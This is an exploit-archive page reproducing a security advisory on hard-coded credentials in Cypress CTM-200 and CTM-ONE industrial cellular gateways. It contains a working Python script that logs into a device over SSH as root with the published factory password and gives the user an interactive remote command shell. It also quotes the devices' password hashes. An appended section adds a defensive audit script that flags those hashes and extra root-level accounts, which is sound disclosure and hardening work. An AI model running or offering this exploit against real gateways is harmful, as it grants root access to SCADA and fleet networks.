Cypress Solutions CTM-200/CTM-ONE Hard-Coded Credentials Remote Root

2021.10.11
Credit: LiquidWorm
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/env python3
#
#
# Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)
#
#
# Vendor: Cypress Solutions Inc.
# Product web page: https://www.cypress.bc.ca
# Affected version: CTM-ONE (1.3.6-latest)
#                   CTM-ONE (1.3.1)
#                   CTM-ONE (1.1.9)
#                   CTM200 (2.7.1.5659-latest)
#                   CTM200 (2.0.5.3356-184)
#
# Summary: CTM-200 is the industrial cellular wireless gateway for fixed
# and mobile applications. The CTM-200 is a Linux based platform powered
# by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard
# features make the CTM-200 ideal for mobile fleet applications or fixed
# site office and SCADA communications.
#
# CTM-ONE is the industrial LTE cellular wireless gateway for mobile and
# fixed applications. CTM-ONE is your next generation of gateway for fleet
# tracking and fixed sites.
#
# ======================================================================
# CTM-200
# /var/config/passwd:
# -------------------
# root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# nobody:*:65534:65534:nobody:/var:/bin/false
# daemon:*:65534:65534:daemon:/var:/bin/false
#
# /var/config/advanced.ini:
# -------------------------
# 0
# 0
# Chameleon
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
#
#
# CTM-ONE
# /etc/shadow:
# ------------
# admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::
# root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::
# daemon:*:16009:0:99999:7:::
# bin:*:16009:0:99999:7:::
# sys:*:16009:0:99999:7:::
# ftp:*:16009:0:99999:7:::
# nobody:*:16009:0:99999:7:::
# messagebus:!:16009:0:99999:7:::
# ======================================================================
#
# Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials
# within their Linux distribution image. This weakness can lead to the
# exposure of resources or functionality to unintended actors, providing
# attackers with sensitive information including executing arbitrary code.
#
# Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)
#            GNU/Linux 2.6.32.25 (arm4tl)
#            lighttpd/1.4.39
#            BusyBox v1.24.1
#            BusyBox v1.15.3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5686
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php
#
#
# 21.09.2021
#

import sys
import paramiko

bnr='''
o ┌─┐┌┬┐┌─┐ ┌─┐ ┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬ ┬
o │ │││││ ┬ ├─┤ ├┬┘│ ││ │ │ └─┐├─┤├┤ │ │
o └─┘┴ ┴└─┘ ┴ ┴ ┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘
o
'''

print(bnr)

if len(sys.argv)<2:
    print('Put an IP.')
    sys.exit()

adrs=sys.argv[1]
unme='root'  # admin
pwrd='Chameleon'

# Connect over SSH with the factory credentials and open an interactive shell loop
rsh=paramiko.SSHClient()
rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
rsh.connect(adrs,username=unme,password=pwrd)

while 1:
    cmnd=input('# ')
    if cmnd=='exit':
        break
    stdin,stdout,stderr=rsh.exec_command(cmnd)
    stdin.close()
    print(str(stdout.read().decode()))

rsh.close()
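The advisory's core finding is visible directly in the account files it quotes: on the CTM-200 the root and admin entries carry the same MD5-crypt hash and admin also has UID 0, and on the CTM-ONE both privileged accounts still carry the factory hashes. The following is an added defensive example, not part of the advisory or the vendor's firmware: an audit script for passwd/shadow-style files pulled from an appliance image that flags exactly those three conditions. The hashes in KNOWN_HARDCODED_HASHES are copied from the advisory text above; the "hardened" sample and its hashes are constructed placeholders, as are the function names.

```python
"""Audit passwd/shadow-style files from an appliance image for the
hard-coded credential pattern described in the advisory.

Findings reported (as (kind, subject) tuples):
  factory-hash  account still carries a hash published in the advisory
  shared-hash   two or more login-capable accounts share one hash
  extra-uid0    an account other than root has UID 0 (passwd files only)
"""
from collections import defaultdict

# Hashes copied verbatim from the advisory; an image that still ships any
# of them is still running the published factory password.
KNOWN_HARDCODED_HASHES = {
    "$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0",
    "$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/"
    "d2u3D/OHlgngU8f9Pn5.gO61vx/",
    "$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5i"
    "TXaehqu/d6ZtxNZtECZhLJrLC/",
}

# Sample inputs: the first two are the listings quoted in the advisory,
# the third is a constructed "fixed" passwd with placeholder hashes.
CTM200_PASSWD = """\
root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
daemon:*:65534:65534:daemon:/var:/bin/false
"""
CTM_ONE_SHADOW = """\
admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::
root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::
daemon:*:16009:0:99999:7:::
nobody:*:16009:0:99999:7:::
messagebus:!:16009:0:99999:7:::
"""
HARDENED_PASSWD = """\
root:$6$CONSTRUCTEDSALT1$PLACEHOLDERHASHROOT:0:0:root:/root:/bin/ash
admin:$6$CONSTRUCTEDSALT2$PLACEHOLDERHASHADMIN:1000:1000:admin:/home/admin:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
"""


def parse_entries(text):
    """Parse passwd (7 fields) or shadow (9 fields) lines into dicts.
    Lines that fit neither layout are skipped rather than guessed at."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) == 7:      # name:hash:uid:gid:gecos:home:shell
            uid = int(f[2]) if f[2].isdigit() else None
            entries.append({"name": f[0], "hash": f[1], "uid": uid})
        elif len(f) == 9:    # name:hash:lastchg:min:max:warn:inactive:expire:flag
            entries.append({"name": f[0], "hash": f[1], "uid": None})
    return entries


def is_login_hash(h):
    """'*', '!'-prefixed and empty hash fields mean a locked account, not a password."""
    return bool(h) and not h.startswith(("*", "!"))


def audit(text):
    """Return a sorted list of findings for one passwd/shadow file."""
    findings = []
    by_hash = defaultdict(list)
    for e in parse_entries(text):
        if e["hash"] in KNOWN_HARDCODED_HASHES:
            findings.append(("factory-hash", e["name"]))
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(("extra-uid0", e["name"]))
        if is_login_hash(e["hash"]):
            by_hash[e["hash"]].append(e["name"])
    for names in by_hash.values():
        if len(names) > 1:
            findings.append(("shared-hash", ",".join(sorted(names))))
    return sorted(findings)


if __name__ == "__main__":
    for label, data in (("CTM-200 passwd", CTM200_PASSWD),
                        ("CTM-ONE shadow", CTM_ONE_SHADOW),
                        ("hardened passwd (constructed)", HARDENED_PASSWD)):
        print(label, "->", audit(data) or "clean")
```

Running it against an image is a matter of passing the file contents to audit(); the hardened sample shows what a clean result looks like once the factory hashes are replaced and admin no longer holds UID 0. The shared-hash check only considers login-capable entries, so locked system accounts that all carry "*" are not reported as sharing a password.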



Copyright 2024, cxsecurity.com